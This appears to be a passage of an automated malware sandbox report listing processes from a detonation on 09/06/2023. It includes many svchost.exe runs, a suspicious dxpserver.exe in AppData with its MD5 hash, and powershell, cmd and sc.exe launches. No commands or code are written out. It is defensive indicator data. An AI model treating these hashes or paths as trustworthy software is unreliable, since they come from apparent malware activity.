MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 21 |
Start time: | 13:29:46 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 22 |
Start time: | 13:29:47 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 23 |
Start time: | 13:29:48 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Target ID: | 24 |
Start time: | 13:29:50 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 25 |
Start time: | 13:29:50 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 26 |
Start time: | 13:29:51 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 27 |
Start time: | 13:29:55 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 28 |
Start time: | 13:29:56 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 31 |
Start time: | 13:29:57 |
Start date: | 09/06/2023 |
Path: | C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff652aa0000 |
File size: | 10264640 bytes |
MD5 hash: | EEE7B971E0B76A0DF56BDAC2AC2FA343 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Antivirus matches: |
|
Target ID: | 32 |
Start time: | 13:29:57 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 33 |
Start time: | 13:29:58 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 34 |
Start time: | 13:29:59 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 35 |
Start time: | 13:30:00 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 36 |
Start time: | 13:30:03 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 37 |
Start time: | 13:30:04 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 38 |
Start time: | 13:30:04 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7466a0000 |
File size: | 447488 bytes |
MD5 hash: | 95000560239032BC68B4C2FDFCDEF913 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Target ID: | 39 |
Start time: | 13:30:04 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6da640000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 40 |
Start time: | 13:30:05 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 41 |
Start time: | 13:30:06 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 42 |
Start time: | 13:30:06 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 43 |
Start time: | 13:30:08 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7cb270000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 44 |
Start time: | 13:30:08 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6da640000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 45 |
Start time: | 13:30:08 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 46 |
Start time: | 13:30:08 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 47 |
Start time: | 13:30:08 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 48 |
Start time: | 13:30:09 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 49 |
Start time: | 13:30:09 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 50 |
Start time: | 13:30:09 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |